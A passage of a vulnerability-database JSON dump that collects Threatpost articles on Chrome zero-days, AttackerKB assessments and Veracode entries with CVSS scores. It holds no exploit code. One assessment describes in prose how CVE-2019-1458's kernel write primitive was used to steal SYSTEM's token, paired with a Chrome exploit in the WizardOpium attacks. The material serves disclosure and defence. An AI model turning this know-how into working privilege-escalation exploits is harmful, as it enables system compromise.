rapid embrace of technology continues to leave users exposed to criminals and nation-state actors. Everyone wants to learn how to hack, too few people are working on defense.\u201d\n\nThe other nine bugs addressed by Google are as follows:\n\n * CVE-2021-30625: Use after free in Selection API. _Reported by Marcin Towalski of Cisco Talos on 2021-08-06_\n * CVE-2021-30626: Out of bounds memory access in ANGLE. _Reported by Jeonghoon Shin of Theori on 2021-08-18_\n * CVE-2021-30627: Type Confusion in Blink layout. _Reported by Aki Helin of OUSPG on 2021-09-01_\n * CVE-2021-30628: Stack buffer overflow in ANGLE. _Reported by Jaehun Jeong(@n3sk) of Theori on 2021-08-18_\n * CVE-2021-30629: Use after free in Permissions. _Reported by Weipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi\u2019anxin Group on 2021-08-26_\n * CVE-2021-30630: Inappropriate implementation in Blink. _Reported by SorryMybad (@S0rryMybad) of Kunlun Lab on 2021-08-30_\n * CVE-2021-30631: Type Confusion in Blink layout. _Reported by Atte Kettunen of OUSPG on 2021-09-06_\n\nKevin Dunne, president at Pathlock, pointed out that Google has patched plenty of zero-days already this year \u2013 eight prior to the latest two, to be exact \u2013 and he said to expect more.\n\n## **10th Zero-Day in 2021 for Google**\n\n\u201cToday, Google released a patch for its tenth [and ninth] zero-day exploit of the year,\u201d Dunne said in an email to media. \u201cThis milestone highlights the emphasis that bad actors are putting on browser exploits, with Chrome becoming a clear favorite, allowing a streamlined way to gain access to millions of devices regardless of OS.\n\n\u201cWe expect to see continued zero-day exploits in the wild,\u201d he added.\n\nThe other zero days discovered so far in 2021 are as follows, many of them in the V8 engine:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 (February)\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 (March)\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 (March)\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 (April)\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 (April, later [used in Windows attacks](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>))\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013 (June)\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 (June)\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 (July)\n\n\u201cGoogle\u2019s commitment to patching these exploits quickly is commendable, as they operate Google Chrome as freeware and therefore are the sole entity who can provide these updates,\u201d Dunne wrote. \u201cGoogle is committed to providing Chrome as a free browser, as it is a critical entry point for other businesses such as Google Search and Google Workspace.\u201d\n\nThe news comes as Apple [rushed a fix](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) for a zero-click zero-day exploit targeting iMessaging. It\u2019s allegedly been used to illegally spy on Bahraini activists with NSO Group\u2019s Pegasus spyware, according to researchers.\n\nMicrosoft is also expected to release its monthly Patch Tuesday set of updates today, so we\u2019ll see if there are yet more zero-day exploits to worry about.\n\n**It\u2019s time to evolve threat hunting into a pursuit of adversaries. **[**JOIN**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** Threatpost and Cybersixgill for **[**Threat Hunting to Catch Adversaries, Not Just Stop Attacks**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** and get a guided tour of the dark web and learn how to track threat actors before their next attack. **[**REGISTER NOW**](<https://threatpost.com/webinars/threat-hunting-catch-adversaries/?utm_source=ART&utm_medium=ART&utm_campaign=September_Cybersixgill_Webinar>)** for the LIVE discussion on Sept. 22 at 2 p.m. EST with Cybersixgill\u2019s Sumukh Tendulkar and Edan Cohen, along with independent researcher and vCISO Chris Roberts and Threatpost host Becky Bracken.**\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T15:03:41", "type": "threatpost", "title": "Pair of Google Chrome Zero-Day Bugs Actively Exploited", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30625", "CVE-2021-30626", "CVE-2021-30627", "CVE-2021-30628", "CVE-2021-30629", "CVE-2021-30630", "CVE-2021-30631", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T15:03:41", "id": "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "href": "https://threatpost.com/google-chrome-zero-day-exploited/169442/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-15T21:47:28", "description": "Google on Monday issued 11 security fixes for its Chrome browser, including a high-severity zero-day bug that\u2019s actively being jumped on by attackers in the wild.\n\nIn a brief update, Google [described](<https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html>) the weakness, tracked as [CVE-2022-0609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0609>), as a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in Chrome\u2019s Animation component. This kind of flaw can lead to all sorts of misery, ranging from the corruption of valid data to the execution of arbitrary code on vulnerable systems. Such flaws can also be used to escape the browser\u2019s security sandbox.\n\n\u201cGoogle is aware of reports that an exploit for CVE-2022-0609 exists in the wild,\u201d according to its security update.\n\nChrome users can fix it straight away, though, by going into the Chrome menu > Help > About Google Chrome.\n\nGiven that the zero day is under active attack, updating Chrome should be done ASAP.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15125804/Chrome-zero-day-e1644947947750.png>)\n\nChrome security updates. Source: Google.\n\nCredit for the Animation zero day goes to Adam Weidemann and Cl\u00e9ment Lecigne, both from Google\u2019s Threat Analysis Group (TAG).\n\nMonday\u2019s update also plastered over four other high-severity use-after-free flaws found in Chrome\u2019s Webstore API, File Manager, [ANGLE](<https://en.wikipedia.org/wiki/ANGLE_\\(software\\)>) and GPU. As well, the company addressed a high-severity integer overflow in [Mojo](<https://chromium.googlesource.com/chromium/src/+/main/docs/mojo_and_services.md>), plus a high-severity h\u200beap buffer overflow in Tab Groups. Finally, Google patched a medium-severity issue with inappropriate implementation in Gamepad API.\n\n## And So It Begins\n\nThis is Chrome\u2019s first zero day of the year, and more are sure to follow. But at least we\u2019ve made it into the new-ish year 10 more days than we managed in 2021, when the first bug to hit arrived on Feb. 4.\n\nLast year delivered a total of these 16 Chrome zero days:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 Feb. 4, a vulnerability in its V8 open-source web engine.\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 March 2, a flaw in the Audio component of Google Chrome.\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 March 12, a use-after-free flaw in Blink, [the browser engine for Chrome](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>) that was developed as part of the Chromium project.\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 April 13, a remote-code execution issue.\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 April 20, an issue with type confusion in V8 in Google Chrome that could have allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013- June 9, a type confusion bug within Google\u2019s V8 open-source JavaScript and WebAssembly engine.\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 June 17, a use-after-free bug.\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 July 15, type confusion in V8.\n * [CVE-2021-30632 and CVE-2021-30633](<https://threatpost.com/google-chrome-zero-day-exploited/169442/>) \u2013 Sept. 13, an out-of-bounds write in V8 and a use-after-free bug in the IndexedDB API, respectively.\n * [CVE-2021-37973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37973>) \u2013 Sept. 24, a use-after-free flaw in Portals.\n * [CVE-2021-37976 and CVE-2021-37975](<https://threatpost.com/google-emergency-update-chrome-zero-days/175266/>) \u2013 Sept. 30, an information leak in core and a use-after-free bug in V8, respectively.\n * [CVE-2021-38000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38000>) and [CVE-2021-38003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38003>) \u2013 Oct. 28, an issue with Insufficient validation of untrusted input in Intents in Google Chrome on Android, and an inappropriate implementation in V8 respectively.\n * [CVE-2021-4102](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4102>) \u2013 Dec. 13, a use after free in V8.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T18:33:28", "type": "threatpost", "title": "Chrome Zero-Day Under Active Attack: Patch ASAP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-02-15T18:33:28", "id": "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "href": "https://threatpost.com/google-chrome-zero-day-under-attack/178428/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-12-09T04:57:03", "description": "Data race in audio in Google Chrome prior to 89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 08, 2021 5:47pm UTC reported:\n\nReported as exploited in the wild at <https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>.\n\nDetails are still scant on this vulnerability as they are being withheld by Google until more people have patched the issue, which was fixed in Chrome 89.0.4389.72. All that we know is that the bug is labeled as an `Object lifecycle issue in audio` and was found by `Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-11`.\n\nGiven the description of this vulnerability as well as its link to a similar vulnerability exploited in the wild in the past (see <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>), its likely that this is a UAF vulnerability. Given the one used in <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/> was a bug in the same component which was then used in the WizardOpium attacks, its likely that this vulnerability will lead to full compromise of the system given past history.\n\nUsers are encouraged to disable JavaScript where possible, particularly for untrusted sites, as this is often needed in order to successfully exploit UAF vulnerabilities in the browser. However this is only a temporary fix, and it is strongly encouraged that users instead upgrade to Chrome 89.0.4389.72 or later, Given there is already active exploitation of this vulnerability, and given the history of bugs within this component, there is a good possibility that we may see more widespread exploitation of this issue in the near future.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-09T00:00:00", "type": "attackerkb", "title": "CVE-2021-21166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2021-21166"], "modified": "2021-03-12T00:00:00", "id": "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9", "href": "https://attackerkb.com/topics/VffVzAAdhq/cve-2021-21166", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-02T17:32:41", "description": "An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka \u2018Win32k Elevation of Privilege Vulnerability\u2019.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at October 19, 2020 5:31pm UTC reported:\n\nKnown as WizardOpium for its use in the WizardOpium attacks, and first written about by Kaspersky Labs. The writeup by Kaspersky Labs can be found at <https://securelist.com/windows-0-day-exploit-cve-2019-1458-used-in-operation-wizardopium/95432/> which shows that this vulnerability was used in conjunction with CVE-2019-13720, which was a 0day in the Chrome browser at the time that occurred due to a race condition between two threads.\n\nIn the WizardOpium attacks, the Chrome vulnerability, aka CVE-2019-13720, was first used to gain an arbitrary read/write primitive in the Chrome render process that lead to arbitrary code execution as the Chrome render (read more on this at <https://bugs.chromium.org/p/chromium/issues/detail?id=888923> if your interested). However this still left attackers with a problem: they needed some way to escape the Chrome render\u2019s sandbox if they wanted to get persistent access to the target.\n\nThis is where CVE-2019-1458 came in. Looking at the advisory at <https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1458> we can see this vulnerability affected quite a wide range of targets, going all the way from Windows 7 up to Windows 10 v1607. Later versions of Windows 10 are not affected, however.\n\nIf one dives around the internet a little bit more though they will stumble across <https://googleprojectzero.blogspot.com/p/rca-cve-2019-1458.html> which was written by the Project Zero team at Google which explains the vulnerability quite well. In essence there is a Uninitialized Variable error in Windows within its Windows Switching code whereby the field `*(gpsi + 0x154)` in the global structure `tagSERVERINFO`, which describes system windows (such as menus, desktops, switch windows, etc), which was not properly initialized at the start of a function, which allowed user mode code to set extra window data in a task switch window of Window class `FNID_SWITCH`, or `0x280`, which can normally only be set by the kernel. Even worse though is the fact that this extra window data is essentially a pointer which is then dereferenced and then written to, which grants the attacker a limited arbitrary write primitive in kernel mode, which then can then use to perform limited controlled writes to kernel memory and take over the system. Attackers then used this limited kernel write primitive to overwrite their current process\u2019s access token value with the value of the SYSTEM process\u2019s access token value, thereby allowing them to execute code as SYSTEM.\n\nIf one then looks at <https://github.com/piotrflorczyk/cve-2019-1458_POC>, which does a deep technical dive into all of the details of this vulnerability, one can see that the affected function was `InitFunctionTables()` within `win32k.sys`, which didn\u2019t appropriately initialize the fields `*(gpsi+0x14E)`, `*(gpsi+0x154)`, and `*(gpsi+0x180)`, despite initializing other fields within the same structure. Microsoft\u2019s patch ensured that these fields were all set up and initialized with appropriate values at the start of the `InitFunctionTables()` call, thus preventing this issue from occurring.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-12-10T00:00:00", "type": "attackerkb", "title": "CVE-2019-1458", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-07-24T00:00:00", "id": "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "href": "https://attackerkb.com/topics/2i67dR7P4e/cve-2019-1458", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-02T17:30:40", "description": "Multiple vulnerabilities have been discovered in Google Chrome, the most severe of which could allow for arbitrary code execution. Google Chrome is a web browser used to access the Internet. Successful exploitation of the most severe vulnerabilities could allow an attacker to execute arbitrary code in the context of the browser. Depending on the privileges associated with the application, an attacker could install programs; view, change, or delete data; or create new accounts with full user rights. If this application has been configured to have fewer user rights on the system, exploitation of the most severe of these vulnerabilities could have less impact than if it was configured with administrative rights.\n\nUse after free in WebAudio in Google Chrome prior to 78.0.3904.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**busterb** at November 01, 2019 6:45pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\n**space-r7** at November 01, 2019 7:32pm UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\n**gwillcox-r7** at November 22, 2020 2:51am UTC reported:\n\nBased on the technical analysis by Kaspersky, this is a very effective exploit, and is able to leverage an info leak, heap grooming, and the malware deployed via watering-hole injection on a Korean-language news portal, establishes persistence via a dropped file on disk.\n\nAn attacker does need to leverage a few items in advance for this and any client-side attack, that is a watering hole injection or some other delivery method. Chrome\u2019s quick patching mechanism means these vulns _typically_ have a short shelf life, though the inability to force users to actually update is a limiting factor.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 2\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-10-10T00:00:00", "type": "attackerkb", "title": "Chrome 0-day exploit CVE-2019-13720 used in Operation WizardOpium", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-13720", "CVE-2019-1458"], "modified": "2020-10-13T00:00:00", "id": "AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "href": "https://attackerkb.com/topics/EfbjmUx1X2/chrome-0-day-exploit-cve-2019-13720-used-in-operation-wizardopium", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-23T17:13:30", "description": "Use after free in Blink in Google Chrome prior to 89.0.4389.90 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 15, 2021 6:18am UTC reported:\n\nReported as exploited in the wild at <https://thehackernews.com/2021/03/another-google-chrome-0-day-bug-found.html> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop_12.html>.\n\nThis bug seems to have scarce details from what I can tell online, however it appears to be a UAF bug within Blink that was reported by an anonymous researcher on 2021-03-09. The details for this bug are currently locked so that only Google employees can access it, but should it be opened to the public the details will be at <https://bugs.chromium.org/p/chromium/issues/detail?id=1186287>.\n\nAs per usual the advice to protect against UAF bugs in browsers is to disable JavaScript on untrusted websites via a plugin such as NoScript. Since most UAF\u2019s require JavaScript to be enabled to conduct exploitation, this will act as an effective mitigation in most cases, but users should not rely on this as their sole protection mechanism.\n\nIt is interesting to see that this is the third 0day exploited in the wild this year in Chrome, alongside CVE-2021-21166, a object lifecycle issue in the audio component, and CVE-2021-21148, a heap buffer overflow within the V8 scripting engine. Time will tell if this trend continues though, but it is interesting to see such an regular cadence of vulnerabilities being exploited in the wild.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-03-16T00:00:00", "type": "attackerkb", "title": "CVE-2021-21193", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193"], "modified": "2021-03-24T00:00:00", "id": "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "href": "https://attackerkb.com/topics/ACMmdhOpt2/cve-2021-21193", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "veracode": [{"lastseen": "2022-07-26T16:44:46", "description": "chromium is vulnerable to information disclosure. The vulnerability exists due to insufficient data validation that allows a remote attacker to leak cross-origin data via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-04-29T13:27:26", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21164"], "modified": "2021-12-03T20:12:37", "id": "VERACODE:30285", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-30285/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-26T16:46:12", "description": "chromium is vulnerable to information disclosure. The vulnerability exists through the lack of data validation in the `Reader Mode` that allows cross-origin data to be leaked.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2021-03-09T14:27:09", "type": "veracode", "title": "Information Disclosure", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21163"], "modified": "2021-12-03T18:11:13", "id": "VERACODE:29634", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29634/summary", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-07-26T13:51:25", "description": "chromium is vulnerable to use after free. A remote attacker is able to potentially exploit heap corruption via a crafted HTML page. \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", 